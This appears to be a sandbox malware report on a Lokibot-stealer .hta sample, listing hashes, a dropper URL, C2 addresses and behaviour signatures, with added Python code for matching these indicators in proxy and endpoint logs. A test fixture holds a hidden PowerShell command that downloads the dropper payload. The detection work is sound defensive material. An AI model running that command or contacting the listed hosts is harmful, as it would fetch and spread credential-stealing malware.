General

  • Target

    5476ba599869d81abee08f38f1c1a1d9.bin

  • Size

    3KB

  • Sample

    241117-blq8lsxhjc

  • MD5

    53b6bdd0388df88cf3ac0c8ec70bff3a

  • SHA1

    b474e080e40cb00315d0c4b9f559c38bce8fa897

  • SHA256

    9c647bd2e704f2fb71d330972614c3a9e7cb9766c469c6a1323f9f4734cb8d06

  • SHA512

    da4a5f59f4b6e859db7e88c5309980f06c31c5d58442c84bd5beef215dd91fea9df205154a43d075ecc3803fdf252b73eca56a023c934979fb16de20a4652a69

Malware Config

Extracted

  • Language

    ps1

  • URLs

    ps1.dropper
    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

    exe.dropper
    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

  • Family

    lokibot

  • C2

    http://94.156.177.95/simple/five/fre.php
    http://kbfvzoboss.bid/alien/fre.php
    http://alphastand.trade/alien/fre.php
    http://alphastand.win/alien/fre.php
    http://alphastand.top/alien/fre.php
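The extracted config above is most useful once it is turned into something that can be matched against traffic. The following is an added example, not part of the sandbox report: it takes the dropper URL and the five Lokibot C2 URLs listed above, normalises them into host/path indicators, and classifies constructed proxy log lines against them. The log lines and their format ("<epoch> <client> <method> <url> <status>") are constructed for the demonstration; the weak "fre.php on an unknown host" rule is an inference from the five C2 paths on this page, all of which end in fre.php, and is deliberately rated low confidence.

```python
"""Indicator matching for the extracted config on this report.

Added example (not part of the sandbox report). DROPPER_URLS and C2_URLS are
copied from the "Malware Config" section; SAMPLE_LOG is constructed.
"""
from urllib.parse import urlsplit

DROPPER_URLS = [
    "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f",
]
C2_URLS = [
    "http://94.156.177.95/simple/five/fre.php",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
]


def normalise(url):
    """Split a URL into (host, path, query) with a lower-cased host."""
    p = urlsplit(url)
    return (p.hostname or "").lower(), p.path, p.query


DROPPER_EXACT = {normalise(u) for u in DROPPER_URLS}
DROPPER_HOSTS = {normalise(u)[0] for u in DROPPER_URLS}
C2_HOSTS = {normalise(u)[0] for u in C2_URLS}
C2_HOST_PATHS = {normalise(u)[:2] for u in C2_URLS}


def classify(method, url):
    """Return (label, confidence) for one proxied request.

    "high" means a full match against the extracted config; "medium" and
    "low" mean a match on a single, weaker attribute.
    """
    if method.upper() == "CONNECT":
        # TLS without interception: the proxy only sees "host:port".
        host = url.rsplit(":", 1)[0].lower()
        if host in DROPPER_HOSTS:
            return ("dropper_host_tls", "low")
        if host in C2_HOSTS:
            return ("lokibot_c2_host_tls", "low")
        return ("clean", None)
    host, path, query = normalise(url)
    if (host, path, query) in DROPPER_EXACT:
        return ("dropper_download", "high")
    if (host, path) in C2_HOST_PATHS:
        return ("lokibot_c2", "high")
    if host in C2_HOSTS:
        return ("lokibot_c2_host", "medium")
    # All five extracted C2 URLs end in "<panel dir>/fre.php"; a POST to
    # fre.php on an unknown host is worth a look, not a verdict.
    if method.upper() == "POST" and path.endswith("/fre.php"):
        return ("fre_php_post_unknown_host", "low")
    if host in DROPPER_HOSTS:
        # filemail.com is a legitimate file-transfer service, so the host on
        # its own is weak evidence; the full filekey URL is the real indicator.
        return ("dropper_host", "low")
    return ("clean", None)


def scan(log_lines):
    """Classify each well-formed log line and return the non-clean hits."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed line, skip rather than guess
        ts, client, method, url, status = parts
        label, conf = classify(method, url)
        if label != "clean":
            hits.append({"ts": ts, "client": client, "label": label,
                         "confidence": conf, "url": url, "status": status})
    return hits


# Constructed proxy log. Line 2 is what an intercepting proxy would record;
# without TLS inspection only line 1 (the CONNECT) is visible for that fetch.
SAMPLE_LOG = [
    "1730945201.103 10.0.0.15 CONNECT 1017.filemail.com:443 200",
    "1730945202.418 10.0.0.15 GET " + DROPPER_URLS[0] + " 200",
    "1730945230.456 10.0.0.15 POST http://94.156.177.95/simple/five/fre.php 200",
    "1730945231.001 10.0.0.15 POST http://alphastand.trade/alien/fre.php 404",
    "1730945240.777 10.0.0.15 POST http://cdn.example.test/panel/fre.php 200",
    "1730945250.000 10.0.0.22 GET https://www.example.test/index.php 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["confidence"], hit["label"], hit["client"], hit["url"])
```

Matching on (host, path) rather than the full URL for the C2 entries keeps the rule stable if the operator rotates query strings, while the dropper is matched on the full URL because the filekey is what distinguishes this sample's payload from any other Filemail download.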

Targets

    • Target

      ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta

    • Size

      178KB

    • MD5

      5476ba599869d81abee08f38f1c1a1d9

    • SHA1

      46748779ec123145fdf90942c9df65d0099c9a99

    • SHA256

      ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669

    • SHA512

      516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd

    • SSDEEP

      96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ

    • Lokibot

      Lokibot is a password and cryptocurrency wallet stealer.

    • Lokibot family

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Evasion via Device Credential Deployment

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Accesses Microsoft Outlook profiles

    • Suspicious use of SetThreadContext
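Two of the signatures above describe behaviour that can be checked in endpoint telemetry rather than network traffic: PowerShell launched with a hidden window (here weighted higher when the parent is a script host such as mshta.exe, the interpreter for the .hta target), and a read of the registry value that holds the configured country code. The following is an added example, not part of the sandbox report. The event records, their field names (loosely modelled on Sysmon process-creation fields; registry reads are not logged by Sysmon, so assume an EDR or sandbox API trace for those) and the exact registry path behind the "Checks computer location settings" signature are assumptions made for this example.

```python
"""Behavioural triage over constructed endpoint telemetry.

Added example, not part of the sandbox report. SAMPLE_EVENTS, the Event
fields and GEO_NATION_SUFFIX are assumptions for the demonstration.
"""
import re
from dataclasses import dataclass

# powershell.exe accepts unique prefixes of parameter names and enum values,
# so "-w hidden", "-win hid" and "-WindowStyle Hidden" all hide the window.
HIDDEN_WINDOW_RE = re.compile(
    r"(?:^|\s)-w(?:i(?:n(?:d(?:o(?:w(?:s(?:t(?:y(?:l(?:e)?)?)?)?)?)?)?)?)?)?"
    r"\s+h(?:i(?:d(?:d(?:e(?:n)?)?)?)?)?(?=\s|$)",
    re.IGNORECASE,
)
# Script hosts that commonly launch PowerShell from an HTA/VBS/JS lure.
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Assumed registry value behind "Checks computer location settings".
GEO_NATION_SUFFIX = r"\control panel\international\geo\nation"


@dataclass
class Event:
    kind: str                 # "process" (creation) or "registry" (read/query)
    image: str                # executable path of the acting process
    parent_image: str = ""    # process events only
    command_line: str = ""    # process events only
    target_object: str = ""   # registry events only


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_hidden_powershell(ev):
    """Flag PowerShell started with a hidden window; rate script-host parents higher."""
    if ev.kind != "process" or basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if not HIDDEN_WINDOW_RE.search(ev.command_line):
        return None
    if basename(ev.parent_image) in SCRIPT_HOST_PARENTS:
        return ("hidden_powershell_from_script_host", "high")
    return ("hidden_powershell", "medium")


def check_geo_lookup(ev):
    """Flag a read of the configured country code (a common geofence check)."""
    if ev.kind != "registry":
        return None
    if ev.target_object.lower().endswith(GEO_NATION_SUFFIX):
        return (f"geo_nation_lookup:{basename(ev.image)}", "low")
    return None


def triage(events):
    """Run every check over every event and return the findings in order."""
    findings = []
    for ev in events:
        for check in (check_hidden_powershell, check_geo_lookup):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: an .hta lure spawning hidden PowerShell that fetches the
# dropper URL from this report, the geo lookup, a scheduled hidden PowerShell
# run (medium, not high) and a benign interactive PowerShell run (no finding).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r'mshta.exe "C:\Users\victim\Downloads\invoice.hta"'),
    Event("process", POWERSHELL, r"C:\Windows\System32\mshta.exe",
          'powershell.exe -nop -w hidden -ep bypass -c "iwr '
          'https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f'
          ' -OutFile $env:TEMP\\x.exe"'),
    Event("registry", POWERSHELL,
          target_object=r"HKCU\Control Panel\International\Geo\Nation"),
    Event("process", POWERSHELL, r"C:\Windows\System32\svchost.exe",
          r"powershell.exe -WindowStyle Hidden -File C:\Scripts\nightly.ps1"),
    Event("process", POWERSHELL, r"C:\Windows\explorer.exe",
          r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for label, confidence in triage(SAMPLE_EVENTS):
        print(confidence, label)
```

The hidden-window check alone is noisy, because scheduled tasks and management agents also start PowerShell hidden; the parent-process condition is what turns it into a useful signal, which is why the two cases above get different confidence levels.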
